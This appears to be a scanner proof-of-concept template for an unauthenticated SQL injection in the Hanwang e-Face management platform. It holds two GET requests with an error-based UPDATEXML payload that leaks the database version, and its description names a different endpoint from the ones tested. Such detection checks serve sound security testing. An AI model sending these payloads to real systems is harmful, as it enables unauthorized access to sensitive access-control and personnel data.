id: hanwang-ediantong-sqli
info:
name: 汉王e脸通综合管理平台SQL注入漏洞
author: avic123
severity: high
verified: true
description: |
汉王e脸通综合管理平台是汉王公司研发的一款基于生物识别技术的智慧园区管理软件,集成了考勤管理、门禁管理、访客管理、巡更管理、消费管理、车控管理、梯控管理、人事管理等多个模块,广泛应用于政府、企业、监狱、学校、智慧社区等多个领域,实现无接触式快速通行,提升管理效率和安全性。其管理平台的 querySysAuthStr.do 接口存在 SQL注入漏洞。攻击者可在无需认证的情况下,通过构造恶意请求参数注入恶意 SQL 语句,导致数据库信息泄露、数据篡改甚至系统权限提升,影响系统数据安全和完整性
reference:
- https://cn-sec.com/archives/4363287.html
tags: hanwang,sqli
created: 2025/08/13
rules:
r0:
request:
method: GET
path: /manage/authMultiplePeople/queryManyPeopleGroupList.do?recoToken=67mds2pxXQb&page=1&pageSize=10&order=(UPDATEXML(2920,CONCAT(0x7e,@@version,0x7e,(SELECT+(ELT(123=123,1)))),8357))
expression: |
response.status == 200 && response.body.bcontains(b"XPATH syntax error:") && response.body.bcontains(b'success')
r1:
request:
method: GET
path: /manage/authMultiplePeople/getGroupEmployee.do?recoToken=67mds2pxXQb&page=1&pageSize=10&groupId=1&order=(UPDATEXML(2920,CONCAT(0x7e,@@version,0x7e,(SELECT+(ELT(123=123,1)))),8357))
expression: |
response.status == 200 && response.body.bcontains(b'success') && response.body.bcontains(b"XPATH syntax error:")
expression: r0() || r1()